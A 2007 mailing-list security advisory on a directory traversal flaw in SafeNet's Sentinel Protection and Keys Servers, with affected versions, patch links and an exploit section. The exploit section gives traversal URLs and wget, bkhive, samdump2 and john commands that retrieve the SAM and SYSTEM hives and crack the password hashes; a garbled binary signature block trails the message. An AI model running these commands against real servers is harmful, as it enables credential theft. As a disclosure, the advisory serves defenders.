SUMMARY
=======

SafeNet Inc.'s Sentinel Protection Server and Sentinel Keys Server
products include web servers which are vulnerable to directory
traversal attacks. A remote attacker could exploit these
vulnerabilities to read arbitrary files with the permissions of the web
server, typically SYSTEM.

AFFECTED SOFTWARE
=================

* Sentinel Protection Server 7.0.0 through 7.4.0 and possibly below
* Sentinel Keys Server 1.0.3 and possibly below

UNAFFECTED
==========

* Sentinel Protection Server 7.4.1
* Sentinel Keys Server 1.0.4

IMPACT
======

A remote attacker could exploit this vulnerability to read sensitive
files on the affected system. Attractive targets include the SAM
registry hive which contains system password hashes.

DETAILS
=======

Sentinel Protection Server and Sentinel Keys Server run web servers on
ports 6002 and 7002, respectively, to allow remote monitoring of key
use. The web server software does not santize request paths correctly
before using them in system calls. As a result, an attacker can request
files outside the web server's directory root by using the ../ notation
to refer to the parent directory of the current directory.

SOLUTION
========

Upgrade to Sentinel Protection Server 7.4.1 and Sentinel Keys Server
1.0.4.

First upgrade the Sentinel Driver software to 7.4.0 if you are using an
earlier version.

http://safenet-inc.com/support/files/Sentinel_Protection_Installer_7.4.0
.zip

Then install "Security Patch to Sentinel Protection Installer 7.4.0"

http://safenet-inc.com/support/files/SPI740SecurityPatch.zip

EXPLOIT
=======

Most popular web browsers are not be able to display URLs exploiting
this problem. I recommend using wget or lynx instead.

Substitute port 7002 to target Keys Server instead of Protection
Server.

This example will retrieve the C:\boot.ini file.

http://XX.XX.XX.XX:6002/../../../../../../boot.ini

This example will retrieve a copy of the target system's SAM registry
hive from the Windows repair folder:

http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam

With the SAM and SYSTEM registry hives, it is possible to extract the
system's local password hashes for offline cracking. For example, using the
bkhive, samdump2, and John the Ripper tools:

$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam
$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/system
$ bkhive system keyfile
$ samdump2 sam keyfile > hashes
$ john --wordlist=all hashes

http://ophcrack.sourceforge.net/bkhive.php
http://www.openwall.com/john/

ACKNOWLEDGMENTS
===============

Thanks to SafeNet for patching this vulnerability and for working with
me on this advisory.

According to Digital Defense, Inc.'s advisory, Corey Lebleu originally
discovered this problem on October 10th, 2007. I discovered the same
vulnerability independently on October 29th, 2007. I have no reason to
doubt Digital Defense, Inc.'s claim, and do not claim to have
discovered the problem first.

REVISION HISTORY
================

2007-11-26 original release

--
Elliot Kendall <ekendall (at) brandeis (dot) edu [email concealed]>
Network Security Architect
Brandeis University

Trouble replying? See http://people.brandeis.edu/~ekendall/sign/
0?´ *?H?÷

 ?¥0?¡

10 +0 *?H?÷


 ?+0?ä0?M 
"v©Bçë,ú«o0
 *?H?÷


0b10 UZA1%0#U
Thawte Consulting (Pty) Ltd.1,0*U#Thawte Personal Freemail Issuing CA0
071126144653Z
081125144653Z0G10UThawte Freemail Member1$0" *?H?÷


ekendall (at) brandeis (dot) edu0 [email concealed]?
"0
 *?H?÷



?
0?

?

âÛB¿ú·§ÉA´vªÑÁ??ÄjãàPl tûÉKW£ÇÌ?[vnxÛQ×Z¾ipÖF=m?ôã¼A­ÛX5?ôí* }-$á±?´Þiqñ6SñØÿ¨Å.?ý_?­"âiÆ°ÐHO@ðO?f?-­¦Éõhåx¿ÒÍIØJ¿ÿÚÿ®
i%k*;E¢Ê?i¬å?Á§ZÇ?CôlÐ%=yßnn݁®5uãZ®fÞ¶À»Ö@¤Á4?¢¹t®àN?lNHZ6ÆéV]ødÉî?$à.¬]h¯{?¥hÜ? p
>ú?0?'AÛÍÄ¥þàOz<³ jç

£2000 U0ekendall (at) brandeis (dot) edu0 [email concealed]U

ÿ00
 *?H?÷


se¼?e? '?µÉOßLh
ÏÂËá9!ï
5ª¿ñM?RÄúÍóÇæZÆ*£Gr?óW0EG­]²¥Z`O¥!X?Èï?ð r3¦°â«8{bP®ØyLqô4À°nÂ]b?Öª??­L?ßÉWmD3S0??0?¨ 


0
 *?H?÷


0Ñ10 UZA10UWestern Cape10U Cape Town10U
Thawte Consulting1(0&UCertification Services Division1$0"UThawte Personal Freemail CA1+0) *?H?÷


personal-freemail (at) thawte (dot) com0 [email concealed]
030717000000Z
130716235959Z0b10 UZA1%0#U
Thawte Consulting (Pty) Ltd.1,0*U#Thawte Personal Freemail Issuing CA0?0
 *?H?÷



0?Ä¦<UsUûN¹Ê?ZhÀupßéÿ£ì½Íõ[òv½:aò¿QÎ
ÔåP
0×cZ,?p?ÝÉð+?Zª?qV˯<çñ?6$*Ï+Õó?w=¾+þ»>¿@?dק¦»?eÑÅ*T?H§¶Ñ<
a@dr`·û

£?0?0U

ÿ0

ÿ
0CU<0:08 6 4?2http://crl.tha
wte.com/ThawtePersonalFreemailCA.crl0U
0)U"0 ¤010UPrivateLabel2-1380
 *?H?÷


H?ÑP?ê.Ì
£f¬g¯¬¾Â¡C??L!¸ø6ª-?6/ÀôP ?p<ý­áabÃÙ:~?±?Å?t?%P?bÇÛ'qW%Ý©?9?? Oe_?Ú÷÷?ÖÆN®öê4å[5MwãV!x?Ü!5Þ$±ÓFÿ]_eO1?Q0?M

0v0b10 UZA1%0#U
Thawte Consulting (Pty) Ltd.1,0*U#Thawte Personal Freemail Issuing CA"v©Bçë,ú«o0 + ±0 *?H?÷

1 *?H?÷


0 *?H?÷

1
071126210611Z0# *?H?÷

1 Hc¥v´?Êä?QóÍû0R *?H?÷

1E0C0
*?H?÷
0*?H?÷
?0
*?H?÷

@0+0
*?H?÷

(0
 *?H?÷



?
ÞÇF$v$[3?rÛÚ?R¬®??-?I?oó"ái?k¶455ê)X¡Ô?48iÏZò(rMî
»\¼ªDI%§O }æÃÉ^{ ?L?ô$kìñtny?8%:ûñ«^Æç?`x`êGR?wÄË|F-å¥E§dçqøý$(Õ T+/ÊPÿPèa
©Í¡Úç"0}z{L+§Å¤X«¼OààÇHg´ò/BC°ðÚ¹½ 6
{ý9ðf??(1â6*»U?GêJºzK?üÁüü"õ
ýÊ?ʍé7Ü??\¦??µú­ïRØvgÞU?fÒt¡åfÉ?

[ reply ]